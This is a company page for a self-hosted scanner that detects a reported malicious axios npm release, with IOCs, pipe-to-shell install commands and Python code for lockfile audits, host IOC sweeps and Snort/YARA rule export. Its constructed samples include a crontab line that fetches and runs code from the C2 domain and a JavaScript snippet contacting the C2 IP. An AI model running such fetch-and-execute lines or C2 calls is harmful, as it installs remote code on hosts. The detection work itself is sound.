Air-gapped • Zero external calls

Supply Chain Scanner

Self-hosted npm supply chain threat detection for VeryPay infrastructure, with each check mapped to the PCI-DSS requirement it supports

Threat Summary

On March 30, 2026, attackers published malicious versions of the axios HTTP client — v1.14.1 and v0.30.4 — to npm. These packages contained a Remote Access Trojan (RAT) that established reverse shells, exfiltrated environment variables (API keys, database credentials), and persisted via OS-level mechanisms.
Indicators of compromise (IOCs):
  C2 domain:  sfrclak.com (port 8000)
  C2 IP:      142.11.206.73
  Dropper:    plain-crypto-js
  Worm:       Shai-Hulud

Quick Start

1. Open a terminal
   macOS: press ⌘ Cmd + Space, type Terminal, press Enter.
   Windows: press Win + X, select PowerShell.
2. Paste the command
   Copy the command for your OS below, go back to the terminal, paste it, then press Enter.
3. Read the result
   The scanner prints CLEAN or INFECTED. If INFECTED, follow the on-screen remediation steps.
macOS / Linux
    curl -sSL https://scan.dev.verypay.io/scan.sh | bash
Scans your home directory for compromised lockfiles, checks host IOCs, and exports detection rules. Takes about 5 seconds.

Linux Server (Docker + systemd + cron)
    curl -sSL https://scan.dev.verypay.io/scan.sh | bash -s -- --server
Same as above plus four extra checks: scans inside Docker containers, and checks systemd services, crontabs, and journalctl logs for C2 activity.

Windows (PowerShell)
    irm https://scan.dev.verypay.io/scan.ps1 | iex
PowerShell equivalent. Checks Registry persistence, Windows RAT files (wt.exe, system.bat), the DNS cache, and scheduled tasks.

CI / Pipeline Mode (JSON output)
    curl -sSL https://scan.dev.verypay.io/scan.sh | bash -s -- --ci --project-dir .
Non-interactive mode for Jenkins/GitHub Actions. Outputs JSON only, scans the current directory, and returns exit code 1 if infected.

Note: piping a remote script straight into bash or iex runs whatever the server returns, with the rights of the user who ran it. On any host that holds production credentials, download the script first, read it, and run it from disk (for example `curl -sSLo scan.sh https://scan.dev.verypay.io/scan.sh`, review it, then `bash scan.sh`). The download is the only external request; the scanner makes no network calls while it runs.
Common Options & Examples
--project-dir ~/Work Only scan lockfiles under a specific directory instead of your entire home folder
--server Enable server mode — adds Docker, systemd, cron, and journalctl checks (Linux only)
--auto-remediate Automatically kill malicious processes, remove RAT files, and block C2 domain in /etc/hosts
--json Suppress terminal output, print only the JSON report to stdout (useful for piping to other tools)
-y Skip the confirmation prompt — useful for automation or when piping to bash
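The lockfile audit that the Quick Start and CI mode describe, as an added example in Python. This is not scan.sh or any VeryPay code: it walks a project directory, parses package-lock.json / npm-shrinkwrap.json (lockfileVersion 1, 2 and 3), npm's hidden node_modules/.package-lock.json and yarn.lock, and flags the two malicious axios versions plus the plain-crypto-js dropper from the threat summary (treated here as an npm package name, which is an assumption). The JSON report shape and the "reason" labels are this example's own choice; only the exit-code contract (1 if infected) comes from the page. The sample lockfiles at the bottom are constructed.

```python
"""Lockfile audit for the axios 1.14.1 / 0.30.4 compromise (added example, not scan.sh)."""
import json
import os
import re
import sys
import tempfile
from datetime import datetime, timezone

MALICIOUS_VERSIONS = {"axios": {"1.14.1", "0.30.4"}}
DROPPER_PACKAGES = {"plain-crypto-js"}          # assumption: the dropper is an npm package name
LOCKFILES = ("package-lock.json", "npm-shrinkwrap.json", ".package-lock.json", "yarn.lock")

# yarn.lock v1: a header line such as `axios@^1.14.0, axios@1.14.1:` followed by an
# indented block that contains `  version "1.14.1"`.
YARN_ENTRY = re.compile(r'^"?(@?[^@"\s]+)@[^\n]*:\n(?:  [^\n]*\n)*?  version "([^"]+)"', re.M)


def _walk_v1(deps, found):
    """lockfileVersion 1 nests transitive deps under each entry's 'dependencies'."""
    for name, info in (deps or {}).items():
        found.append((name, info.get("version", "")))
        _walk_v1(info.get("dependencies"), found)


def parse_npm_lock(text):
    """Return (name, version) pairs from any npm lockfile version."""
    data = json.loads(text)
    found = []
    for key, info in data.get("packages", {}).items():   # lockfileVersion 2/3
        if key == "":                                     # "" is the root project itself
            continue
        # keys are install paths, e.g. node_modules/axios/node_modules/@scope/pkg
        found.append((info.get("name") or key.split("node_modules/")[-1], info.get("version", "")))
    if not found:
        _walk_v1(data.get("dependencies"), found)          # lockfileVersion 1
    return found


def parse_yarn_lock(text):
    return [(m.group(1), m.group(2)) for m in YARN_ENTRY.finditer(text)]


def classify(name, version):
    if name in DROPPER_PACKAGES:
        return "dropper"
    if version in MALICIOUS_VERSIONS.get(name, ()):
        return "malicious_version"
    return None


def audit_lockfile_text(filename, text):
    pairs = parse_yarn_lock(text) if filename == "yarn.lock" else parse_npm_lock(text)
    return [{"package": n, "version": v, "reason": r} for n, v in pairs if (r := classify(n, v))]


def audit_project(project_dir):
    """Scan every lockfile below project_dir; node_modules is walked too, for the hidden lockfile."""
    findings = []
    for root, _dirs, files in os.walk(project_dir):
        for fn in files:
            if fn in LOCKFILES:
                path = os.path.join(root, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings += [{"lockfile": path, **h} for h in audit_lockfile_text(fn, fh.read())]
    return {"scanned_at": datetime.now(timezone.utc).isoformat(),
            "project_dir": project_dir,
            "status": "INFECTED" if findings else "CLEAN",
            "findings": findings}


def exit_code(report):
    return 1 if report["status"] == "INFECTED" else 0


# Constructed samples: a v3 package-lock.json with the malicious axios and the dropper
# nested under it, and a yarn.lock pinning the malicious 0.x line.
SAMPLE_NPM_LOCK = json.dumps({
    "name": "verypay-checkout", "lockfileVersion": 3,
    "packages": {
        "": {"name": "verypay-checkout", "dependencies": {"axios": "^1.14.0"}},
        "node_modules/axios": {"version": "1.14.1"},
        "node_modules/follow-redirects": {"version": "1.15.6"},
        "node_modules/axios/node_modules/plain-crypto-js": {"version": "1.0.0"},
    },
})
SAMPLE_YARN_LOCK = """# yarn lockfile v1

axios@^0.30.0:
  version "0.30.4"
  resolved "https://registry.yarnpkg.com/axios/-/axios-0.30.4.tgz"
  dependencies:
    follow-redirects "^1.15.6"

follow-redirects@^1.15.6:
  version "1.15.6"
  resolved "https://registry.yarnpkg.com/follow-redirects/-/follow-redirects-1.15.6.tgz"
"""


def demo():
    """Write the constructed samples into a temporary project and audit it."""
    with tempfile.TemporaryDirectory() as project:
        os.mkdir(os.path.join(project, "legacy"))
        with open(os.path.join(project, "package-lock.json"), "w") as fh:
            fh.write(SAMPLE_NPM_LOCK)
        with open(os.path.join(project, "legacy", "yarn.lock"), "w") as fh:
            fh.write(SAMPLE_YARN_LOCK)
        return audit_project(project)


if __name__ == "__main__":
    report = audit_project(sys.argv[1]) if len(sys.argv) > 1 else demo()
    print(json.dumps(report, indent=2))
    sys.exit(exit_code(report))
```

Run it with a project path to scan a real checkout (`python audit.py .` in a pipeline step fails the job on a hit), or with no arguments to see the constructed samples reported. Matching on exact versions rather than semver ranges is deliberate: a range such as `^1.14.0` in package.json says nothing about what was installed, only the resolved version in the lockfile does.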

16 Checks Across 4 Layers

LAYER 1 — 5 checks
Package Audit
Lockfile scanning, malicious version detection, dropper directory checks, npm cache analysis, install script anomalies
LAYER 2 — 5 checks
Host IOC Sweep
RAT files on disk, process scanning, network connections to C2, DNS cache inspection, persistence mechanisms
LAYER 3 — 4 checks
Forensic Artifacts
Hidden lockfile analysis, npm log forensics, shell history traces, Shai-Hulud worm detection
LAYER 4 — 2 checks
Content & Export
YARA-equivalent pattern scan, Snort IDS rules and YARA rule export for infrastructure teams
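The Layer 2 host IOC sweep (and the crontab and journalctl checks of server mode), as an added example in Python that is not scan.sh or VeryPay code. It runs three checks over text the scanner would collect from a Linux host: established TCP sessions to the C2 in `ss -tnp` output, IOC strings in crontab, shell-history and journal lines, and whether /etc/hosts already sinkholes the C2 domain, producing the entry that the page's --auto-remediate option would append if not. The `ss` row format, the regular expressions, the choice of 0.0.0.0 as the sinkhole address and the report shape are this example's assumptions; the samples at the bottom are constructed.

```python
"""Host IOC sweep for the axios RAT indicators (added example, not scan.sh)."""
import os
import re
import subprocess

C2_DOMAIN = "sfrclak.com"
C2_IP = "142.11.206.73"
DROPPER = "plain-crypto-js"
IOC_PATTERNS = [re.compile(p, re.I) for p in (
    re.escape(C2_DOMAIN), re.escape(C2_IP), re.escape(DROPPER),
    r"shai[-_]?hulud", r"axios@(?:1\.14\.1|0\.30\.4)\b")]

# `ss -tnp` rows: State Recv-Q Send-Q Local:Port Peer:Port [users:(("cmd",pid=N,fd=M))]
SS_ROW = re.compile(r"^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)"
                    r"(?:\s+users:\(\((?P<proc>.*)\)\))?")


def parse_ss(output):
    """Return (state, peer_ip, peer_port, process) for each connection row."""
    rows = []
    for line in output.splitlines()[1:]:             # skip the header row
        m = SS_ROW.match(line.strip())
        if not m:
            continue
        ip, _, port = m.group("peer").rpartition(":")
        if not port.isdigit():                        # e.g. "*:*" on listeners
            continue
        rows.append((m.group("state"), ip.strip("[]"), int(port), m.group("proc") or ""))
    return rows


def c2_connections(ss_output):
    """Any TCP session whose peer is the C2 address, whatever the port."""
    return [r for r in parse_ss(ss_output) if r[1] == C2_IP]


def ioc_hits(lines, source):
    """(source, line) for every line containing a C2, dropper or worm indicator."""
    return [(source, ln) for ln in lines if any(p.search(ln) for p in IOC_PATTERNS)]


def hosts_sinkhole_entry(hosts_text):
    """Return the /etc/hosts line that sinkholes the C2 domain, or None if one exists.

    Only a sinkhole address counts: an entry mapping the domain to its real
    address would pin the C2, not block it.
    """
    for line in hosts_text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) >= 2 and C2_DOMAIN in fields[1:] and fields[0] in ("0.0.0.0", "127.0.0.1", "::1"):
            return None
    return f"0.0.0.0 {C2_DOMAIN}  # sinkhole: axios RAT C2"


def sweep(ss_output, crontab_lines, history_lines, journal_lines, hosts_text):
    findings = [{"check": "c2_connection", "detail": f"{s} -> {ip}:{port} {proc}"}
                for s, ip, port, proc in c2_connections(ss_output)]
    for source, lines in (("crontab", crontab_lines), ("shell_history", history_lines),
                          ("journal", journal_lines)):
        findings += [{"check": "ioc_string", "source": src, "detail": ln}
                     for src, ln in ioc_hits(lines, source)]
    entry = hosts_sinkhole_entry(hosts_text)
    remediation = [f"append to /etc/hosts: {entry}"] if findings and entry else []
    return {"status": "INFECTED" if findings else "CLEAN",
            "findings": findings, "remediation": remediation}


def _run(*cmd):
    try:
        return subprocess.run(cmd, capture_output=True, text=True, check=False).stdout
    except FileNotFoundError:
        return ""


def live_sweep():
    """Collect the real inputs on a Linux host and run sweep() over them."""
    hist_path = os.path.expanduser("~/.bash_history")
    history = open(hist_path, errors="replace").read().splitlines() if os.path.exists(hist_path) else []
    hosts = open("/etc/hosts").read() if os.path.exists("/etc/hosts") else ""
    return sweep(_run("ss", "-tnp"), _run("crontab", "-l").splitlines(), history,
                 _run("journalctl", "--no-pager", "-o", "cat").splitlines(), hosts)


# Constructed samples: one live session to the C2 among normal traffic, a crontab that
# re-fetches from the C2 at boot, and a shell history showing the dropper being installed.
SAMPLE_SS = """State Recv-Q Send-Q Local Address:Port  Peer Address:Port    Process
ESTAB 0      0      10.20.0.14:44212    10.20.0.2:5432       users:(("postgres",pid=1201,fd=9))
ESTAB 0      0      10.20.0.14:51934    142.11.206.73:8000   users:(("node",pid=4242,fd=21))
ESTAB 0      0      10.20.0.14:40011    151.101.1.69:443     users:(("node",pid=4242,fd=19))
"""
SAMPLE_CRONTAB = ["0 3 * * * /usr/local/bin/backup.sh",
                  "@reboot curl -s http://sfrclak.com:8000/u | sh"]
SAMPLE_HISTORY = ["git pull", "npm install plain-crypto-js", "npm ci"]
SAMPLE_JOURNAL = ["sshd[911]: Accepted publickey for deploy from 10.20.0.9"]
SAMPLE_HOSTS = "127.0.0.1 localhost\n::1 localhost\n"

if __name__ == "__main__":
    import json
    print(json.dumps(sweep(SAMPLE_SS, SAMPLE_CRONTAB, SAMPLE_HISTORY, SAMPLE_JOURNAL, SAMPLE_HOSTS), indent=2))
```

The connection check keys on the peer IP rather than on port 8000 alone, so a RAT that is re-pointed to another port on the same host is still caught, while unrelated services on port 8000 are not flagged. The process field (pid and fd) is what you need for the "kill malicious processes" step, so it is carried into the finding.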

PCI-DSS Compliance Mapping

Requirement  Description                     Scanner coverage
5.2          Anti-malware mechanisms         IOC detection + YARA rules detect known RAT payloads
6.3.2        Software inventory              Lockfile audit inventories all third-party dependencies
6.5.4        Supply chain attack protection  Detects compromised packages and C2 callbacks
10.2         Audit trail for events          JSON report with timestamped check-by-check results
11.4         Intrusion detection             Exported Snort rules for network IDS deployment
11.5         File integrity monitoring       Content pattern scan detects malicious code in any path
12.10        Incident response plan          Auto-remediation steps with credential rotation checklist
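The Layer 4 rule export and "YARA-equivalent" content scan behind the 11.4 and 11.5 rows above, as an added example in Python that is not scan.sh or VeryPay code. snort_rules() and yara_rule() render the IOCs from the threat summary as rules the network and endpoint teams can deploy; scan_bytes() and scan_tree() apply the same strings (ASCII and UTF-16LE, case-insensitive) without a yara install. The sid range, rule names and the exact rule text are this example's choices, and the sample file content is constructed.

```python
"""Snort/YARA export and content scan for the axios RAT IOCs (added example, not scan.sh)."""
import os

IOCS = {
    "c2_domain": "sfrclak.com",
    "c2_ip": "142.11.206.73",
    "dropper": "plain-crypto-js",
}
C2_PORT = 8000
SID_BASE = 1000001          # local rules conventionally live above 1,000,000 (assumption)


def dns_content(domain):
    """Wire-format DNS name as a Snort content match, e.g. |07|sfrclak|03|com|00|."""
    return "".join(f"|{len(label):02x}|{label}" for label in domain.split(".")) + "|00|"


def snort_rules():
    """Three rules: the C2 TCP session, a DNS lookup of the C2 domain, any contact with the IP."""
    d, ip = IOCS["c2_domain"], IOCS["c2_ip"]
    return "\n".join([
        f'alert tcp $HOME_NET any -> {ip} {C2_PORT} (msg:"axios RAT C2 session to {d}"; '
        f'flow:to_server,established; sid:{SID_BASE}; rev:1;)',
        f'alert udp $HOME_NET any -> any 53 (msg:"axios RAT C2 DNS lookup {d}"; '
        f'content:"{dns_content(d)}"; nocase; sid:{SID_BASE + 1}; rev:1;)',
        f'alert ip $HOME_NET any -> {ip} any (msg:"axios RAT C2 IP contact"; '
        f'sid:{SID_BASE + 2}; rev:1;)',
    ]) + "\n"


def yara_rule():
    strings = "\n".join(f'        ${name} = "{value}" ascii wide nocase'
                        for name, value in IOCS.items())
    return ("rule axios_rat_c2_iocs\n{\n    meta:\n"
            '        description = "axios 1.14.1 / 0.30.4 RAT: C2 and dropper strings"\n'
            f"    strings:\n{strings}\n    condition:\n        any of them\n}}\n")


def scan_bytes(data):
    """Find every IOC as ASCII or UTF-16LE ("wide"), case-insensitively, like the YARA rule.

    Returns (ioc_name, offset, encoding) tuples sorted by offset.
    """
    hits = []
    lowered = data.lower()                    # bytes.lower() folds ASCII letters only, which is what we want
    for name, value in IOCS.items():
        for encoding, needle in (("ascii", value.encode()), ("wide", value.encode("utf-16-le"))):
            needle = needle.lower()
            start = lowered.find(needle)
            while start != -1:
                hits.append((name, start, encoding))
                start = lowered.find(needle, start + 1)
    return sorted(hits, key=lambda h: h[1])


def scan_tree(root, max_bytes=32 * 1024 * 1024):
    """Scan every regular file under root (size-capped, symlinks skipped); returns {path: hits}."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                if os.path.islink(path) or os.path.getsize(path) > max_bytes:
                    continue
                with open(path, "rb") as fh:
                    hits = scan_bytes(fh.read())
            except OSError:
                continue
            if hits:
                results[path] = hits
    return results


# Constructed sample: a minified helper that contacts the C2, as a dropper might ship it.
SAMPLE_FILE = (b'const u="http://sfrclak.com:8000/c";'
               b'require("https").get(u.replace("sfrclak.com","142.11.206.73"))')

if __name__ == "__main__":
    print(snort_rules())
    print(yara_rule())
    for hit in scan_bytes(SAMPLE_FILE):
        print(hit)
```

Write `snort_rules()` to a file under the sensor's local rules and `yara_rule()` to the endpoint team's rule set; both are plain text. The byte scanner is the fallback for hosts without yara: it searches the raw bytes, so minified bundles, compiled `.node` addons and UTF-16 Windows scripts are all covered, at the cost of no regex or hex-pattern support.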

Not a Developer? Here's What to Do

You don't need to run the scanner yourself. Follow these steps to make sure your machine is checked by the security team.

1. Ask your Team Lead
   Forward this page to your Team Lead or DevOps engineer and ask them to run the scanner on your machine. They will open a terminal and paste one command; it takes less than 10 seconds.
2. Check the result
   After the scan finishes, the screen shows one of two results:
   CLEAN: your machine is safe, no action needed.
   INFECTED: disconnect from the network first, then follow the on-screen steps and contact the security team.
3. If you suspect something
   If your machine is acting strange (unusual slowness, unfamiliar processes, unexpected network activity), do not wait for a scan. Disconnect from the network and report to the security team immediately via Teams or email.
View Scan Report: client-side JSON viewer for the scanner's report; no data leaves your browser.